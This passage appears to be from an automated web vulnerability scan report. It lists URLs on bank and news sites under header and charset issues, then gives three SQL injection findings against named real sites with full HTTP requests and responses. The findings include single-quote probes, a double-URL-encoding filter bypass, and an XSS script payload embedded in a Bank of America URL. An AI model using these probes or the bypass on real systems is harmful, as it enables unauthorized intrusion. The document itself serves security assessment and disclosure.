23.1. https://app.icontact.com/icp/signup.php

23.2. https://arbor.custhelp.com/ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png

23.3. https://careers.jpmorganchase.com/

23.4. https://content.pncmc.com/live/pnc/careers/main/index.html

23.5. https://content.pncmc.com/live/pnc/personal/OLBDemo/sgtour.html

23.6. https://fls.doubleclick.net/activityi

23.7. https://mfasa.chase.com/auth/fcc/login

23.8. https://online.wellsfargo.com/common/html/wibdisc.html

23.9. https://picasaweb.google.com/lh/view

23.10. https://secure.ed4.net/charteronebank/genenroll/signup.cfm

23.11. https://secure.ed4.net/citizensbank/genenroll/signup.cfm

23.12. https://secure.img-cdn.mediaplex.com/0/13770/universal.html

23.13. https://secure.opinionlab.com/ccc01/comment_card.asp

23.14. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

23.15. https://secure.opinionlab.com/rate36s.asp

23.16. https://www.1sttools.com/loginout/login.asp

23.17. https://www.chase.com/

23.18. https://www.chase.com/Chase.html

23.19. https://www.chase.com/auto-loan/car-loan.htm

23.20. https://www.chase.com/ccp/index.jsp

23.21. https://www.chase.com/ccpmweb/shared/document/webtrends.html

23.22. https://www.chase.com/chf/mortgage/om_chasecom_redirect

23.23. https://www.chase.com/cm/chf/miscellaneous/page/hmda.html

23.24. https://www.chase.com/index.jsp

23.25. https://www.chase.com/online/Checking/chase-checking-account.htm

23.26. https://www.chase.com/online/Home-Lending/mortgages.htm

23.27. https://www.chase.com/online/Home-Refinance/mortgage-refinancing.htm

23.28. https://www.chase.com/online/auto-loan/car-loan.htm

23.29. https://www.chase.com/online/investments/annuities.htm

23.30. https://www.chase.com/online/investments/financial-services.htm

23.31. https://www.chase.com/online/services/branch-message.htm

23.32. https://www.chase.com/wamuwelcome3/

23.33. https://www.citicapitaladvisors.com/

23.34. https://www.ibsnetaccess.com/spotlight/ibsspotlight.html

23.35. https://www.merrilledge.com/m/pages/home.aspx

23.36. https://www.myschedule.navyfederal.org/

23.37. https://www.mystreetscape.com/my/charteroneinvest

23.38. https://www.mystreetscape.com/my/citizensinvest

23.39. https://www.navyfederal.org/

23.40. https://www.navyfederal.org/about/about.php

23.41. https://www.navyfederal.org/about/eligibility-checklist.php

23.42. https://www.navyfederal.org/about/presidents-message.php

23.43. https://www.navyfederal.org/account-management/how-do-i.php

23.44. https://www.navyfederal.org/account-management/index.php

23.45. https://www.navyfederal.org/assets/rates/discl.html

23.46. https://www.navyfederal.org/branches-atms/index.php

23.47. https://www.navyfederal.org/browser-requirements.html

23.48. https://www.navyfederal.org/contact-us.php

23.49. https://www.navyfederal.org/favicon.ico

23.50. https://www.navyfederal.org/how-to-become-a-member.php

23.51. https://www.navyfederal.org/index.php

23.52. https://www.navyfederal.org/life-money/family-life.php

23.53. https://www.navyfederal.org/life-money/kids-college-retirement.php

23.54. https://www.navyfederal.org/life-money/managing-your-money/managing-your-money.php

23.55. https://www.navyfederal.org/life-money/military-life.php

23.56. https://www.navyfederal.org/life-money/savings-investments.php

23.57. https://www.navyfederal.org/life-money/work-life.php

23.58. https://www.navyfederal.org/membership-benefits/military-exclusives.php

23.59. https://www.navyfederal.org/membership-benefits/offers-discounts/auto-199.php

23.60. https://www.navyfederal.org/membership-benefits/offers-discounts/balanceTransferOffer.php

23.61. https://www.navyfederal.org/membership-benefits/offers-discounts/offers-discounts.php

23.62. https://www.navyfederal.org/mobile/mobiledemo.php

23.63. https://www.navyfederal.org/pdf/ebrochures/1116e.pdf

23.64. https://www.navyfederal.org/pdf/publications/NFCU_198_PrivacyPolicy.pdf

23.65. https://www.navyfederal.org/products-services/business-services/business-services.php

23.66. https://www.navyfederal.org/products-services/business-services/credit-cards.php

23.67. https://www.navyfederal.org/products-services/business-services/loans.php

23.68. https://www.navyfederal.org/products-services/business-services/retirement-insurance.php

23.69. https://www.navyfederal.org/products-services/business-services/savings-checking.php

23.70. https://www.navyfederal.org/products-services/cards/creditcards/creditcard-rates.php

23.71. https://www.navyfederal.org/products-services/cards/creditcards/creditcards.php

23.72. https://www.navyfederal.org/products-services/cards/debit-cards.php

23.73. https://www.navyfederal.org/products-services/cards/giftcards/gift-cards.php

23.74. https://www.navyfederal.org/products-services/checking-savings/certificates-rates.php

23.75. https://www.navyfederal.org/products-services/checking-savings/certificates.php

23.76. https://www.navyfederal.org/products-services/checking-savings/checking-protection.php

23.77. https://www.navyfederal.org/products-services/checking-savings/checking-rates.php

23.78. https://www.navyfederal.org/products-services/checking-savings/checking.php

23.79. https://www.navyfederal.org/products-services/checking-savings/direct-deposit.php

23.80. https://www.navyfederal.org/products-services/checking-savings/iras.php

23.81. https://www.navyfederal.org/products-services/checking-savings/money-market.php

23.82. https://www.navyfederal.org/products-services/checking-savings/savings-rates.php

23.83. https://www.navyfederal.org/products-services/checking-savings/savings.php

23.84. https://www.navyfederal.org/products-services/investments-insurance/events.php

23.85. https://www.navyfederal.org/products-services/investments-insurance/insurance.php

23.86. https://www.navyfederal.org/products-services/investments-insurance/investments.php

23.87. https://www.navyfederal.org/products-services/investments-insurance/nffg.php

23.88. https://www.navyfederal.org/products-services/investments-insurance/tax-center.php

23.89. https://www.navyfederal.org/products-services/investments-insurance/trust-services.php

23.90. https://www.navyfederal.org/products-services/loans/auto/auto-loans.php

23.91. https://www.navyfederal.org/products-services/loans/auto/auto-rates.php

23.92. https://www.navyfederal.org/products-services/loans/boat-bike-rv/boat-bike-rv-loans.php

23.93. https://www.navyfederal.org/products-services/loans/equity/equity.php

23.94. https://www.navyfederal.org/products-services/loans/mortgage/mortgage-rates.php

23.95. https://www.navyfederal.org/products-services/loans/mortgage/mortgage.php

23.96. https://www.navyfederal.org/products-services/loans/other/more-loans.php

23.97. https://www.navyfederal.org/products-services/loans/realtyplus.php

23.98. https://www.navyfederal.org/products-services/switch-to-navy-federal.php

23.99. https://www.navyfederal.org/search.php

23.100. https://www.navyfederal.org/site-map.php

23.101. https://www.navyfederal.org/usa-federal-credit-union-merger/index.php

23.102. https://www.navyfederal.org/vendors/vendorMain.php

23.103. https://www.navyfederal.org/visabuxx/visa-buxx.php

23.104. https://www.navyfederal.org/why-choose-navy-federal.php

23.105. https://www.pnc.com/MapQuest/mqlocator/index.html

23.106. https://www.pnc.com/searchpnc/servlets/SearchPNCServletOnePNC

23.107. https://www.pnc.com/webapp/sec/Forms.do

23.108. https://www.pnc.com/webapp/sec/ProductsAndService.do

23.109. https://www.pnc.com/webapp/unsec/Blank.do

23.110. https://www.pnc.com/webapp/unsec/Gateway.do

23.111. https://www.pnc.com/webapp/unsec/Homepage.do

23.112. https://www.pnc.com/webapp/unsec/NCProductsAndService.do

23.113. https://www.pnc.com/webapp/unsec/ProductsAndService.do

23.114. https://www.pnc.com/webapp/unsec/Solutions.do

23.115. https://www.pnc.com/webapp/unsec/depositRates/init.app

23.116. https://www.pnc.com/webapp/unsec/homeEquity/init.app

23.117. https://www.pncsites.com/IRA/home.html

23.118. https://www.pncsites.com/points/index.html

23.119. https://www.pncvirtualwallet.com/

23.120. https://www.wachovia.com/

23.121. https://www.wachovia.com/common_files/metrics/tc/tc_targeting.html

23.122. https://www.wachovia.com/files/Hands_on_Banking.pdf

23.123. https://www.wellsfargo.com/about/diversity/

23.124. https://www.wellsfargo.com/autoloans/

23.125. https://www.wellsfargo.com/browser/jaws_setting

23.126. https://www.wellsfargo.com/careers/

23.127. https://www.wellsfargo.com/checking/

23.128. https://www.wellsfargo.com/credit_cards/

23.129. https://www.wellsfargo.com/equity/

23.130. https://www.wellsfargo.com/help/

23.131. https://www.wellsfargo.com/help/faqs/signon_faqs

23.132. https://www.wellsfargo.com/help/services

23.133. https://www.wellsfargo.com/insurance/

23.134. https://www.wellsfargo.com/insurance/id_credit_protection/idtheft

23.135. https://www.wellsfargo.com/investing/hsa/enroll

23.136. https://www.wellsfargo.com/investing/investmentservices/

23.137. https://www.wellsfargo.com/investing/more

23.138. https://www.wellsfargo.com/investing/mutual_funds/

23.139. https://www.wellsfargo.com/investing/retirement/

23.140. https://www.wellsfargo.com/investing/retirement/openira/

23.141. https://www.wellsfargo.com/jump/about/fdic

23.142. https://www.wellsfargo.com/jump/applications/inprogress

23.143. https://www.wellsfargo.com/jump/wachovia/EFS/WAC1

23.144. https://www.wellsfargo.com/jump/wachovia/insurance/identity

23.145. https://www.wellsfargo.com/jump/wachovia/mortgage/firsttimebuyer

23.146. https://www.wellsfargo.com/mortgage/

23.147. https://www.wellsfargo.com/mortgage/rates

23.148. https://www.wellsfargo.com/online_brokerage/education/trading/volatile/

23.149. https://www.wellsfargo.com/per/more/banking

23.150. https://www.wellsfargo.com/per/more/loans_credit

23.151. https://www.wellsfargo.com/personal_credit/

23.152. https://www.wellsfargo.com/personal_credit/rate_payments/rate_calc_main

23.153. https://www.wellsfargo.com/privacy_security/

23.154. https://www.wellsfargo.com/privacy_security/fraud/

23.155. https://www.wellsfargo.com/privacy_security/fraud/report/

23.156. https://www.wellsfargo.com/privacy_security/fraud/report/fraud

23.157. https://www.wellsfargo.com/privacy_security/online/guarantee

23.158. https://www.wellsfargo.com/products_services/applications_viewall

23.159. https://www.wellsfargo.com/rates/rates_viewall

23.160. https://www.wellsfargo.com/savings_cds/

23.161. https://www.wellsfargo.com/savings_cds/apply

23.162. https://www.wellsfargo.com/savings_cds/cds

23.163. https://www.wellsfargo.com/sitemap

23.164. https://www.wellsfargo.com/student/

23.165. https://www.wellsfargo.com/tas

23.166. https://www.wellsfargo.com/theprivatebank/

23.167. https://www.wellsfargo.com/wachovia

23.168. https://www.wellsfargo.com/wachovia/

23.169. https://www.wellsfargo.com/wachovia/autoloans/index

23.170. https://www.wellsfargo.com/wachovia/insurance

23.171. https://www.wellsfargo.com/wachovia/wealthmanagement/index

23.172. https://www.wellsfargo.com/wfonline/

23.173. https://www.wellsfargo.com/wfonline/bill_pay/

23.174. https://www.wellsfargoadvisors.com/

23.175. https://www2.bankofamerica.com/cferror.cgi

23.176. https://www2.bankofamerica.com/favicon.ico

23.177. https://www3.financialtrans.com/tf/FANWeb

24. Multiple content types specified

24.1. http://sr2.liveperson.net/visitor/addons/deploy.asp

24.2. http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html

25. HTML does not specify charset

25.1. http://a.tribalfusion.com/

25.2. http://a.tribalfusion.com/j.ad

25.3. http://ad.thehill.com/favicon.ico

25.4. http://ai.hitbox.com/ai

25.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.6. https://careers.jpmorganchase.com/

25.7. http://cdn.invisionpower.com/public/min/index.php

25.8. https://charterone.mortgagewebcenter.com/ApplyNow/Application.asp

25.9. https://citizensbankri.mortgagewebcenter.com/ApplyNow/Application.asp

25.10. http://community.invisionpower.com/clickheat/click.php

25.11. http://famspam.com/facebox/

25.12. http://fls.doubleclick.net/activityi

25.13. https://fls.doubleclick.net/activityi

25.14. http://image.wareseeker.com/software/78/index_565291.gif

25.15. http://jqueryui.com/about

25.16. http://news.google.com/intl/en_us/about.html

25.17. https://online.wellsfargo.com/common/html/wibdisc.html

25.18. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

25.19. https://secure.opinionlab.com/rate36s.asp

25.20. http://sr2.liveperson.net/visitor/addons/deploy.asp

25.21. http://usa.visa.com/ext/nav/footer.html

25.22. http://usa.visa.com/js/customanalink.js

25.23. http://usa.visa.com/personal/security/protect_yourself/common_frauds/phishing.html

25.24. http://usa.visa.com/personal/security/protect_yourself/visa_security_tips.html

25.25. http://usa.visa.com/personal/security/vbv/index.html

25.26. http://usa.visa.com/sitewide/sitemap.html

25.27. http://usbank.com/privacy_pledge.html

25.28. http://vendorweb.citibank.com/HG

25.29. http://redcated/jaction/avevao_SOmainFooterIFrame_10

25.30. https://redcated/iaction/deupnc_PersonalBankingHome_4

25.31. http://wealthmanagement.bankofamerica.com/

25.32. https://www.1sttools.com/loginout/login.asp

25.33. http://www.arbornetworks.com/en/contact-us.html

25.34. http://www.bankofamerica.com/deposits/checksave491c6%22%3E%3Cscript%3Ealert(1)%3C/script%3E20cb5e334dd/index.cfm

25.35. https://www.chase.com/online/Home/Chase-Home.dwt

25.36. https://www.chase.com/online/auto-loan/car-loan.html

25.37. https://www.chase.com/wamuwelcome3/

25.38. http://www.citi.com/CBOL/Home

25.39. http://www.citi.com/JRS/helpcenter/getHelpContent.do

25.40. http://www.citi.com/domain/disclaim/

25.41. http://www.citi.com/domain/home.htm

25.42. http://www.citi.com/domain/redirect/corp/asst_man.htm

25.43. http://www.citi.com/domain/redirect/corp/cdob.htm

25.44. http://www.citi.com/domain/redirect/corp/cg_sec_svcs.htm

25.45. http://www.citi.com/domain/redirect/corp/cgts.htm

25.46. http://www.citi.com/domain/redirect/corp/diners.htm

25.47. http://www.citi.com/domain/redirect/corp/e_biz.htm

25.48. http://www.citi.com/domain/redirect/corp/exp_bank.htm

25.49. http://www.citi.com/domain/redirect/corp/fund_svcs.htm

25.50. http://www.citi.com/domain/redirect/corp/merc_ser.htm

25.51. http://www.citi.com/domain/redirect/corp/private.htm

25.52. http://www.citi.com/domain/redirect/corp/trade_svcs.htm

25.53. http://www.citi.com/domain/redirect/search/sm_biz/401k.htm

25.54. http://www.citi.com/domain/redirect/search/sm_biz/biz_aadv.htm

25.55. http://www.citi.com/domain/redirect/search/sm_biz/biz_plat.htm

25.56. http://www.citi.com/domain/redirect/search/sm_biz/cit_biz.htm

25.57. http://www.citi.com/domain/redirect/search/sm_biz/citi_cap.htm

25.58. http://www.citi.com/domain/redirect/search/sm_biz/citibiz.htm

25.59. http://www.citi.com/domain/redirect/search/sm_biz/glance.htm

25.60. http://www.citi.com/domain/redirect/search/sm_biz/merc_ser.htm

25.61. http://www.citi.com/domain/redirect/search/sm_biz/realest.htm

25.62. http://www.citi.com/domain/redirect/search/us.htm

25.63. http://www.citi.com/domain/scripts/config.js

25.64. http://www.citi.com/favicon.ico

25.65. http://www.citi.com/privacy/us_priv.htm

25.66. http://www.citi.com/resourcs/misc/styles.css

25.67. http://www.citi.com/track/

25.68. http://www.citi.com/usc/05/multi/cvg/DPR/TY/April/default.htm

25.69. http://www.citi.com/usc/_spredir.htm

25.70. https://www.citicapitaladvisors.com/

25.71. http://www.firstnational.com/001/html/en/about_us/about_us.html

25.72. http://www.firstnational.com/001/html/en/about_us/careers/careers.html

25.73. http://www.firstnational.com/001/html/en/commercial/commercial.html

25.74. http://www.firstnational.com/001/html/en/personal/cardproducts/creditcards/credit_card_main.html

25.75. http://www.firstnational.com/001/html/en/personal/cardproducts/gift_cards/giftcards_index.html

25.76. http://www.firstnational.com/001/html/en/personal/faqs/tran/system_technical_requirements.html

25.77. http://www.firstnational.com/001/html/en/personal/online_serv/account_alerts.html

25.78. http://www.firstnational.com/001/html/en/personal/online_serv/activate_card.html

25.79. http://www.firstnational.com/001/html/en/personal/online_serv/credit_card_payments.html

25.80. http://www.firstnational.com/001/html/en/personal/online_serv/online_banking.html

25.81. http://www.firstnational.com/001/html/en/personal/online_serv/online_billpay.html

25.82. http://www.firstnational.com/001/html/en/personal/online_serv/online_services.html

25.83. http://www.firstnational.com/001/html/en/personal/online_serv/paperless_statements.html

25.84. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/banking_accounts.html

25.85. http://www.firstnational.com/001/html/en/personal/pers_products_serv/banking_accts/checking_accts/checking_accounts.html

25.86. http://www.firstnational.com/001/html/en/personal/pers_products_serv/first_at_work/firstatwork_program.html

25.87. http://www.firstnational.com/001/html/en/personal/pers_products_serv/invest_advisory/invest_advisory.html

25.88. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/mortgage_loans/mortgage_loans.html

25.89. http://www.firstnational.com/001/html/en/personal/pers_products_serv/loan_accts/vehicle_loans.html

25.90. http://www.firstnational.com/001/html/en/personal/personal.html

25.91. http://www.firstnational.com/001/html/en/personal/product_info.html

25.92. http://www.firstnational.com/001/html/en/personal/resource_center/brochures.html

25.93. http://www.firstnational.com/001/html/en/personal/resource_center/calculators.html

25.94. http://www.firstnational.com/001/html/en/personal/resource_center/newsletters/newsletters.html

25.95. http://www.firstnational.com/001/html/en/personal/resource_center/resource_center.html

25.96. http://www.firstnational.com/001/html/en/personal/resource_center/seminars.html

25.97. http://www.firstnational.com/001/html/en/personal/resource_center/tax_center/tax_center.html

25.98. http://www.firstnational.com/001/html/en/sitemap/sitemap.html

25.99. http://www.firstnational.com/001/html/en/small_business/small_business.html

25.100. http://www.firstnational.com/config/html/en/searchresults.asp

25.101. http://www.firstusa.com/xcards4/common/weblinking/weblinking.html

25.102. http://www.google.com/instant/

25.103. http://www.google.com/intl/en/ads/

25.104. http://www.google.com/intl/en/options/

25.105. http://www.google.com/intl/en_us/ads/

25.106. http://www.ibsnetaccess.com/

25.107. https://www.ibsnetaccess.com/spotlight/ibsspotlight.html

25.108. http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species

25.109. https://www.myschedule.navyfederal.org/

25.110. https://www.mystreetscape.com/my/charteroneinvest

25.111. https://www.mystreetscape.com/my/citizensinvest

25.112. http://www.oneofacard.com/generalinfo2.asp

25.113. https://www.pnc.com/MapQuest/mqlocator/index.html

25.114. https://www.pncadvisors.com/ilink/index.html

25.115. https://www.pncadvisors.com/thirdpartyindex.html

25.116. https://www.pncsites.com/IRA/home.html

25.117. http://www.retirement.merrilledge.com/publish/images/

25.118. http://www.thestandard.com.hk/favicon.ico

25.119. http://www.thestandard.com.hk/news_detail.asp

25.120. http://www.usbank.com/cust_serv_cs.html

25.121. http://www.usbank.com/locators.html

25.122. https://www.wachovia.com/

25.123. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354

25.124. http://www.washingtonpost.com/wp-dyn/content/article/2010/11/2pcmag.com/article2/0,2817,237354%20%20%20%20%20%20%20%20%20businessweek.com/ap/financialnews/D9J%20%20%20%20nytimes.com/2010/11/29/technology/29paypal.html%20%20%20%20%20%20%20%20%20%20%20bloomberg.com/news/2010-11-2cQtwMwAw

25.125. https://www4.usbank.com/favicon.ico

26. HTML uses unrecognised charset

26.1. https://secure.opinionlab.com/ccc01/comment_card.asp

26.2. http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html

26.3. http://www.julong.com.cn/en/News/188.html

26.4. http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm

27. Content type incorrectly stated

27.1. https://a248.e.akamai.net/atlas.download.akamai.com/

27.2. http://a3.twimg.com/profile_images/357754763/cross_normal.gif

27.3. http://affiliate.invisionpower.com/scripts/track.php

27.4. http://api.maps.yahoo.com/ajaxymap

27.5. http://api.viglink.com/api/ping

27.6. https://arbor.custhelp.com/ci/browserSearch/desc/https:/arbor.custhelp.com/app/answers/list/kw/{searchTerms}/Support%20Home%20Page%20Search/Support%20Home%20Page%20Search/images/icons/Search16.png

27.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.8. http://cdn.invisionpower.com/public/min/index.php

27.9. http://chat.livechatinc.net/licence/1043255/script.cgi

27.10. http://community.invisionpower.com/clickheat/click.php

27.11. http://community.invisionpower.com/public/js/3rd_party/prettify/lang-sql.js

27.12. https://content.pncmc.com/live/pnc/mastheads/flashMastheads/

27.13. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab

27.14. http://evsecure-aia.verisign.com/EVSecure2006.cer

27.15. http://fx-rate.net/fx-rates.php

27.16. http://image.wareseeker.com/software/wii/abc/index_3be9d26a20-fasm.gif

27.17. http://image.wareseeker.com/software/wii/abc/index_3beab2d827-fasm.gif

27.18. http://image.wareseeker.com/software/wii/avatar/index_37932e028-fasm.gif

27.19. http://image.wareseeker.com/software/wii/avatar/index_3bf358a284-fasm.gif

27.20. http://image.wareseeker.com/software/wii/avatar/index_3bf57e24dc-fasm.gif

27.21. http://image.wareseeker.com/software/wii/hot/index_37e93d637-fasm.gif

27.22. http://image.wareseeker.com/software/wii/hot/index_3837e34dd-fasm.gif

27.23. http://image.wareseeker.com/software/wii/hot/index_3866c73c1-fasm.gif

27.24. http://news.google.com/complete/search

27.25. http://news.google.com/news/xhr/star

27.26. https://secure.opinionlab.com/pageviewer/pv_controlboard.html

27.27. https://secure.opinionlab.com/rate36s.asp

27.28. http://spd.netconversions.com/

27.29. http://sr2.liveperson.net/hcp/html/mTag.js

27.30. http://sr2.liveperson.net/visitor/addons/deploy.asp

27.31. http://thehill.com/templates/thehill/favicon.ico

27.32. http://redcated/jaction/avevao_SOmainFooterIFrame_10

27.33. http://wareseeker.com/images/favicon.ico

27.34. http://www.arbornetworks.com/en/contact-us.html

27.35. http://www.bankofamerica.com/favicon.ico

27.36. http://www.bankofamerica.com/global/images/new_Banklogo.gif

27.37. https://www.bankofamerica.com/homepage/WidgetAction.go

27.38. https://www.bankofamerica.com/homepage/overview

27.39. https://www.capitalone.com/favicon.ico

27.40. http://www.charterone.com/ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx

27.41. http://www.charterone.com/ajax/common.ashx

27.42. http://www.charterone.com/images/standard-od.png

27.43. http://www.citizensbank.com/ajax/Citizens.CmsSite.Web.Cms.Templates.v2.Common.CommonHeader,Citizens.CmsSite.Web.ashx

27.44. http://www.citizensbank.com/ajax/common.ashx

27.45. http://www.citizensbank.com/images/standard-od.png

27.46. http://www.facebook.com/extern/login_status.php

27.47. http://www.jpmorgan.com/cm/Satellite

27.48. http://www.jpmorgan.com/favicon.ico

27.49. https://www.navyfederal.org/favicon.ico

27.50. http://www.w3.org/TR/html4/loose.dtd

27.51. http://www.w3.org/TR/html4/strict.dtd

27.52. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

27.53. https://www.wachovia.com/foundation/v/index.jsp

27.54. https://www2.bankofamerica.com/favicon.ico

27.55. https://www4.usbank.com/internetBanking/RequestRouter

28. Content type is not specified



1. SQL injection  next
There are 3 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.learningsolutions.com.hk/index.php [User-Agent HTTP header]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learningsolutions.com.hk
Path:   /index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /index.php HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:56:42 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:56:43 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:56:43 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:56:44 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:56:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 24854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...
</b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

Request 2

GET /index.php HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:56:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:56:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:56:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:56:45 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:56:45 GMT
Connection: close
Content-Type: text/html
Content-Length: 24436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...

1.2. http://www.thestandard.com.hk/news_detail.asp [art_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Issue detail

The art_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the art_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /news_detail.asp?we_cat=4&art_id=107529'&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 01:57:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=CABDPJKADHMKIKHPIDDLPNCO; path=/
Cache-control: private


<html>

<HTML>
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e21'</font>
<p>
<font face="Arial" size=2>ODBC driver does no
...[SNIP]...

1.3. http://www.youtube.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:57:33 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=m0XBBtAthZY; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:57:33 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:57:33 GMT
Set-Cookie: GEO=bc7103ce4190df0c025f1e8acab27b75cwsAAAAzR0KtwdbzTUoLjQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFhQTnNRNnZmYTRhLTdpdTd2UVBWaGsyWG5nbkZqNmZZcVNDM3RNTEtlWTJ3 -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
